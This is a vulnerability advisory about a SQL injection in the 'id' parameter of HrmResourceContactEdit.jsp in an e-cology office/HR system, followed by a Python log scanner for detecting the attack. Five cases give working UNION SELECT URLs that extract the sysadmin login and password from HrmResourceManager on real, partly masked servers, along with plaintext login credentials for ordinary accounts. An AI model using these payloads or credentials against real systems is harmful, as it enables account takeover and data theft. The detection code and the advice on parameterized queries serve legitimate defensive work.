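### Brief description:
### Detailed description:
Injection point: /hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29&isView=1
The injectable parameter is id.
An ordinary user login is required.
Case 1:
Tested on the official website after logging in with a mobile phone number. After logging in, visit: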
http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1
[<img src="https://images.seebug.org/upload/201604/02182142b9737b5eeee9eb8ced03e1517621213e.png" alt="ecology11.png" width="600">](https://images.seebug.org/upload/201604/02182142b9737b5eeee9eb8ced03e1517621213e.png)
Because the versions differ, the number of columns differs, but the injection point is the same.
Case 2: http://**.**.**.**:812/login/Login.jsp?logintype=1
Log in as 程凯/111111, then visit:
http://**.**.**.**:812/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1
[<img src="https://images.seebug.org/upload/201604/021826062b1f6f8b651b19bd3fa14d8bf1d2a6a7.png" alt="ecology12.png" width="600">](https://images.seebug.org/upload/201604/021826062b1f6f8b651b19bd3fa14d8bf1d2a6a7.png)
Case 3: http://**.**.**.**/login/Login.jsp?logintype=1
Log in as wangp/111111, then visit:
http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1
[<img src="https://images.seebug.org/upload/201604/02182939898ac575245c9a24d1f551f9dd93f8b0.png" alt="ecology13.png" width="600">](https://images.seebug.org/upload/201604/02182939898ac575245c9a24d1f551f9dd93f8b0.png)
Case 4: http://**.**.**.**:18881/login/login.jsp
guobg/1. The column count here is 92.
After logging in, visit:
http://**.**.**.**:18881/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=88%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1
[<img src="https://images.seebug.org/upload/201604/021834146a998bdaf64d89c6c8c1a53ccd0fa39e.png" alt="ecology14.png" width="600">](https://images.seebug.org/upload/201604/021834146a998bdaf64d89c6c8c1a53ccd0fa39e.png)
Case 5: **.**.**.**:8080/login/Login.jsp?logintype=1
杨先坤/111. The column count is 105.
After logging in, visit:
**.**.**.**:8080/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=35%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1
[<img src="https://images.seebug.org/upload/201604/02183939ce8107f8cae048e1ec08b29a13716cb7.png" alt="ecology16.png" width="600">](https://images.seebug.org/upload/201604/02183939ce8107f8cae048e1ec08b29a13716cb7.png)
Tested versions include: 8.100.0531+KB81001511, 7.100.0331, 5.000.0327+KB50001107, 4.100.0919
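One way a defender could spot requests against this injection point in web access logs, as an added example that is not part of the original advisory. Because `id` is expected to be a plain integer and the column count of the payload varies by version, the check flags any non-numeric `id` instead of matching one specific payload. The combined log format, the sample log lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Injection point named in the advisory; compared case-insensitively.
TARGET_PATH = "/hrm/resource/hrmresourcecontactedit.jsp"
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_id(url):
    """Return the decoded id value if it is not a plain integer, else None."""
    parts = urlsplit(url)
    if parts.path.lower() != TARGET_PATH:
        return None
    # parse_qs percent-decodes the value, so %20 and %27 become ' ' and "'".
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if not re.fullmatch(r"[0-9]+", value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_id) for every flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            bad = suspicious_id(m.group(1))
            if bad is not None:
                hits.append((n, bad))
    return hits


# Constructed sample log lines (documentation addresses, shortened column list).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Apr/2016:18:20:01 +0800] "GET /hrm/resource/HrmResourceContactEdit.jsp'
    '?isfromtab=true&id=29&isView=1 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [02/Apr/2016:18:21:42 +0800] "GET /hrm/resource/HrmResourceContactEdit.jsp'
    '?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,loginid%20from%20HrmResourceManager'
    '&isView=1 HTTP/1.1" 200 5301',
    '192.0.2.10 - - [02/Apr/2016:18:22:10 +0800] "GET /login/Login.jsp?logintype=1 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric id -> {value!r}")
```

The same integer-only rule, enforced server-side before the value reaches the SQL statement (or replaced by a parameterized query), closes the injection point regardless of version.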
### Proof of vulnerability: